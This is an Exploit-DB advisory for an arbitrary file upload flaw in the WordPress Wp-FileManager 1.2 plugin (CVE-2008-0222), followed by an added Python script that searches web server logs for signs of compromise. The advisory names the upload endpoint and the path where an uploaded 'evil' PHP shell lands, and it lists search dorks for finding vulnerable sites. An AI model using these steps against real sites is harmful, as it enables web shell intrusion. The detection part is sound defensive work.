WordPress Plugin Wp-FileManager 1.2 - Arbitrary File Upload

Author: Houssamix
type: webapps
platform: php
date_added: 2008-01-05  
date_updated: 2016-11-08  
verified: 1  
codes: OSVDB-43417;CVE-2008-0222  
tags: WordPress Plugin  
application_url: http://www.exploit-db.comwp-filemanager.1.2.zip  

raw file: 4844.txt  
######################################################################################
# AUTHOR : H-T TeaM {HouSSaMix _ ToXiC350}                                           #
# HOME : http://no-hack.net                                                          #
# Script :  Wordpress Plugin Wp-FileManager                                          #
# Download : http://downloads.wordpress.org/plugin/wp-filemanager.1.2.zip            #
# BUG :  Remote File Upload Vulnerability [ Shell Upload Exploit  ]                  #
######################################################################################

(~)| 3xpl0it4t10n :

		This file allows you to directly upload a PHP script or anything else you want.

		You just have to browse to :

			http://[TARGEt]/[path_wordpress]/wp-content/plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php

		After uploading your evil script, you will find it in this directory :

			http://[TARGEt]/[path_wordpress]/uploaded/[evil].(php)


		Here are some dorks :

          plugins/wp-filemanager/
          inurl:/wp-filemanager/




# greezt : GoLd_M , RoMaNcYxHaCkEr , DDos , and all muslims Hackers



######################################################################################
#                  H-T TeaM {HouSSaMix _ ToXiC350}                                   #
######################################################################################

# milw0rm.com [2008-01-06]
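
For triage on a site that ran this plugin, the two paths named in the advisory (the `ajaxfilemanager/` endpoint and scripts served from `/uploaded/`) are what to look for in the web server log. The following is an added example, not part of the original advisory: it assumes the Apache/nginx "combined" log format and that an upload shows up as a POST under the plugin's `ajaxfilemanager/` directory, and the sample log lines are constructed.

```python
import re
from collections import defaultdict

# Paths come from the advisory; the "combined" access-log format is an assumption.
FM_DIR = "/wp-content/plugins/wp-filemanager/ajaxfilemanager/"
SCRIPT = re.compile(r"/uploaded/[^/]+\.(?:php\d?|phtml|phar)(?:/|$)", re.I)
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')

def triage(lines):
    """Map client IP -> set of tags describing suspicious requests."""
    tags = defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not an access-log line we understand
        ip, method, uri, status = m.groups()
        path = uri.split("?", 1)[0]
        if FM_DIR in path.lower():
            tags[ip].add("fm-post" if method == "POST" else "fm-access")
        elif SCRIPT.search(path):
            # 2xx: a script under /uploaded/ exists and was served by the PHP handler
            tags[ip].add("script-hit" if status.startswith("2") else "script-probe")
    return dict(tags)

def likely_compromise(tags):
    """IPs that both posted to the file manager and got a 2xx from a script in /uploaded/."""
    return sorted(ip for ip, t in tags.items() if {"fm-post", "script-hit"} <= t)

# Constructed sample log (documentation IP ranges, not real traffic).
FM = "/blog/wp-content/plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php"
SAMPLE = [
    f'203.0.113.7 - - [05/Jan/2008:10:01:02 +0000] "GET {FM} HTTP/1.1" 200 5120 "-" "-"',
    f'203.0.113.7 - - [05/Jan/2008:10:01:40 +0000] "POST {FM} HTTP/1.1" 200 310 "-" "-"',
    '203.0.113.7 - - [05/Jan/2008:10:02:05 +0000] "GET /blog/uploaded/x.php HTTP/1.1" 200 42 "-" "-"',
    '198.51.100.20 - - [05/Jan/2008:10:05:00 +0000] "GET /blog/uploaded/photo.jpg HTTP/1.1" 200 20480 "-" "-"',
    '198.51.100.20 - - [05/Jan/2008:10:06:00 +0000] "GET /blog/uploaded/old.php HTTP/1.1" 404 210 "-" "-"',
]

if __name__ == "__main__":
    result = triage(SAMPLE)
    for ip, t in sorted(result.items()):
        print(ip, sorted(t))
    print("likely compromise:", likely_compromise(result))
```

Any `script-hit` is worth investigating on its own, since a legitimate upload directory has no reason to serve PHP; the correlation only ranks which clients to look at first.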